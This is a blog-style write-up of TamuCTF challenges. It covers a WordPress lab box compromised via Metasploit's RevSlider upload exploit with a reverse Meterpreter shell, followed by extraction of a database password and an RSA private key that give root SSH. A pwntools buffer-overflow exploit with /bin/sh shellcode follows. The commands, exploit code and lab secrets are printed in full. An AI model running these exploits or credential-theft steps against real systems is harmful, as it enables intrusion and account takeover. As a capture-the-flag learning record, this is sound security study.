TamuCTF was a 9 days long CTF, and many challenges are practical that we can use it in the real world. This is the fifth time I participate in the CTF, and personally I think that's easier than usual. I still need to learn more basic knowledges as I almost didn't get points in Android, Network, ReadingRainbow, and Web fields. As each Honeypot challenge has extraordinary big file, I couldn't download it! Eventually, I was 322nd out of 1896 teams. Anyway, I need to practice more web, reversing, pwn, and networking challenges.

This Post includes the writeup to the following Challenges.

Network

Wordpress

We find two hosts with nmap.

Then we open the host 172.30.0.3 with port 80.

curl -v 172.30.0.3

The server hosts a wordpress site. The hint in the title says the flag is in the path: /root/flag.txt, so we consider a way to access into host 172.30.0.3 and get it. Then we run wpscan to detect vulnerable components.

wpscan --url 172.30.0.3

We find two vulnerabilities. The first one is a file read vulnerability:

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1579

The second one is a file upload vulnerability.

WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload

Unfortunately, we can just use root privilege to read files, so we focus on the second vulnerability.

In this case, we can use metasploit.

$msfconsole

 [-] Failed to connect to the database: could not connect to server: Connection refused

Is the server running on host "localhost" (::1) and accepting

TCP/IP connections on port 5432?

    could not connect to server: Connection refused

Is the server running on host "localhost" (127.0.0.1) and accepting

TCP/IP connections on port 5432?                            

    cowsay++

    ____________

   < metasploit >

   ------------
   \   ,__,
    \  (oo)____
       (__)    )\
          ||--|| *
          =[ metasploit v4.17.3-dev                          ]
    -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
    -- --=[ 538 payloads - 41 encoders - 10 nops            ]
    -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    msf > search revslider

  [!] Module database cache not built yet, using slow search
    Matching Modules
    ================
    Name                                             Disclosure Date  Rank       Description
      ----                                             ---------------  ----       -----------
     exploit/unix/webapp/wp_revslider_upload_execute  2014-11-26       excellent  WordPress RevSlider File Upload and Execute Vulnerability

    msf > use exploit/unix/webapp/wp_revslider_upload_execute
    msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST 172.30.0.3
   RHOST => 172.30.0.3
   msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit

   [*] Started reverse TCP handler on 172.30.0.14:4444 
   [+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/xyXWLY.php
   [*] Calling payload...
   [*] Sending stage (37775 bytes) to 172.30.0.3
   [*] Meterpreter session 1 opened (172.30.0.14:4444 -> 172.30.0.3:32924) at 2019-03-05 04:29:29 -0500
   [+] Deleted xyXWLY.php
   [+] Deleted ../revslider.zip

   meterpreter > pwd
   /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
   meterpreter > shell
   Process 78 created.
   Channel 0 created.
   python -c 'import pty; pty.spawn("/bin/bash")'
   <t/plugins/revslider/temp/update_extract/revslider$ pwd
   pwd
   /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
   <t/plugins/revslider/temp/update_extract/revslider$ cd /var/www
   cd /var/www
   www-data@apacheword:/var/www$ ls
   ls
   index.php     wp-admin          wp-cron.php    wp-mail.php
   license.txt   wp-blog-header.php    wp-includes    wp-settings.php
   note.txt  wp-comments-post.php  wp-links-opml.php  wp-signup.php
   readme.html   wp-config.php         wp-load.php    wp-trackback.php
   wp-activate.php  wp-content         wp-login.php   xmlrpc.php
   www-data@apacheword:/var/www$ cat note.txt
   cat note.txt
   Your ssh key was placed in /backup/id_rsa on the DB server.

As I mentioned, we can't open the flag file because the flag.txt only can be read by root. Here we got an important information. We can consider to log in as root by ssh if we can find private key on the DB server || path:/backup/id_rsa Some significant information may be hiden inside of configuration file: wp-config.php So, we confirm wp-config.php

cat wp-config.php 
   cat wp-config.php
   <?php
   /**
    * The base configuration for WordPress
    *
    * The wp-config.php creation script uses this file during the
    * installation. You don't have to use the web site, you can
    * copy this file to "wp-config.php" and fill in the values.
    *
    * This file contains the following configurations:
    *
    * * MySQL settings
    * * Secret keys
    * * Database table prefix
    * * ABSPATH
    *
    * @link https://codex.wordpress.org/Editing_wp-config.php
    *
    * @package WordPress
    */
   // ** MySQL settings - You can get this info from your web host ** //
   /** The name of the database for WordPress */
   define('DB_NAME', 'wordpress');

   /** MySQL database username */
   define('DB_USER', 'wordpress');

   /** MySQL database password */
   define('DB_PASSWORD', '0NYa6PBH52y86C');

   /** MySQL hostname */
   define('DB_HOST', '172.30.0.2');

   /** Database Charset to use in creating database tables. */
   define( 'DB_CHARSET', 'utf8' );

   /** The Database Collate type. Don't change this if in doubt. */
   define( 'DB_COLLATE', '' );
   ...

We got the DB password.

Connect to DB:

mysql -u wordpress -h 172.30.0.2 -p wordpress Enter password:

MySQL [wordpress]> select load_file('/backup/id_rsa');

Then we get RSA private key.

   | -----BEGIN RSA PRIVATE KEY-----
   MIIEpAIBAAKCAQEA3Z35DpTcnm4kFkkGp6iDXqvUNH+/+hSDOY6rXsa40WMr7rjc
   tHh8TgOBFZ6Rj5VzU/jY8O0qHxiPVn7BCYKhqyp1V1l9/ZCPRSjRLYy62dVTiHUt
   ZbiPiY9+biHIsQ/nZfwiHmwlb0sWDoyFvX3OL/3AFMcYpZ4ldHQuwszJF4DeTV33
   ruSBoXIiICQyNJBHTboVel+WXAfMNumYMVNrtrwpNoD7whv9Oa2afUejXMJL42Rw
   8Xhab59HIIL9fl68FqgggVI4X3d/fzqKKGyoN5JxBLmQTCiVxhxTMv9OS0MhdSg6
   Nh3+lf/wUuweUQXqmohvETntwwGs8jnJGCyeDwIDAQABAoIBAHGVRpG/n/cfMiWt
   1dhWGMaLwJ4Ln6QXoU39nj1cEltWvayDWLKyUdtWFnGzLJ1vloVCNEX+96iqWMSX
   AG7UYfGtOCjFuDoePh/PFK6IwzdkC4UTsWnCFucFAWKGtCpzoUB24jG/ccxBqpNY
   WC9PbD7SigDcLfisPjwaU+EJPkNpl93VBk1BCJRbvWF+Wl/si3wmMZ0YRoyIAF5L
   oBsq935xH8kJcixSVYKjG3hMUZfiLoQB+p/IFsxDlfGLE+M1esTZ5GIRjj+t7vBN
   l2JZTY893gjfQzUv2WrJXzMhJvWGzOCsRRc4gOSeS6GYiip8glqg8iWHpWdgF6i9
   oAQx5pkCgYEA7oTmvy0cXvhPjkEbrizCCqf6sXfZps5e6eminTTBGA8NW/Uq+SQv
   5JEYxvIL+qMH6cKkc8rBaNhgy3vnv+UgE1PUFI0UWFGKb+OpzzvY/zkmf03enxrl
   SK+QXH4FS9f7leivZRVEWBq1kDVIqHZtybYGg0etOvHYX0GwqV2UTy0CgYEA7dv0
   bxz6CO9bhxxpXRrrykX2Z57J3JW2I3yVkCY+4Y6x106K11X+b1547kEZk40i2Ugc
   iE6jcYIRiYNiSgb0Ph4uxZHFlvBr8JA2fGHYIAnGRcoc1Gzgz5omRvU9H8uy5ipO
   LyZ2dnMgXRVOjuXoN4UZR2rgWmJVLD1q7eKnh6sCgYAnVOUUC2VNR9celx/wZdMN
   nMubLi9G8Wr3WZ6GG+fnhrvmORSABvaa005pqApPp0irxHwH2BxypJO5mlIJ88eJ
   SF6FkQoU0kVo0/rxgGX1GEB/56BZTj8W8FR23BUVf6UuADPEEHC3spfUEuVLWlQa
   WhjS1yP6v1y1wIhYNWU6dQKBgQDbZ1zdcXkh7MgcpRR7kW2WM1rK0imZk29i5HSB
   dwXhwWJCHGztnKEJ0bby7pHNDQ7sJhxLj14sQbIzikGLz0ZUVjsGeyQryrGGQUBB
   E2/sfZeqoHhfad8lICfWpDgxsA/hR3y++VekgyWDNzgzj9bX/6oFuowgUzwFhtGv
   hLbL6QKBgQCvcDMmWs2zXwmIo1+pIHUUSv2z3MWb0o1dzHQI/+FJEtyQPwL1nCwg
   bJaC0KT45kw0IGVB2jhWf0KcMF37bpMpYJzdsktSAmHdjLKdcr6vw2MNpRapaNQe
   On0QmLzbpFr9kjqorinKVkjk/WlTo9rKDSrLiUueEVYTxEMCi92giw==
   -----END RSA PRIVATE KEY-----

We can use this private key to log in as the root.

nano pkey.key

Copy&Paste the RSA private key to a key file. (We create a file named pkey.key)

Generate a public key:

ssh-keygen -p -f pkey.key

Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 

Your identification has been saved with the new passphrase.

root@fang:~# ssh-keygen -y -f pkey.key > pkey.pub
Enter passphrase: 

Use the private key to perform SSH authentication as root:

root@fang:~# ssh-add pkey.key

Enter passphrase for pkey.key: 

Identity added: pkey.key (pkey.key)

 root@fang:~# ssh root@172.30.0.3 
X11 forwarding request failed on channel 0

 Welcome to Ubuntu 14.04 LTS (GNU/Linux 4.4.0-141-generic x86_64)
  * Documentation:  https://help.ubuntu.com/
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.

root@apacheword:~# ls
flag.txt
root@apacheword:~# cat flag.txt 
gigem{w0rd_pr3ss_b3st_pr3ss_409186FC8E2A45FE}

Access granted.

PWN

pwn3

Python code:

from pwn import *

p = remote("pwn.tamuctf.com", 4323)
k = p.recvline()
print k

k = k.split(" ")[9]

k=(k[:10])
bufferLocation = p32(int(k,16))

shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
payload = ""
payload += shellcode
payload += "\x90"*(298-len(shellcode))

payload += "A"*4
payload += bufferLocation

p.sendline(payload)
p.sendline("cat flag.txt")
p.interactive()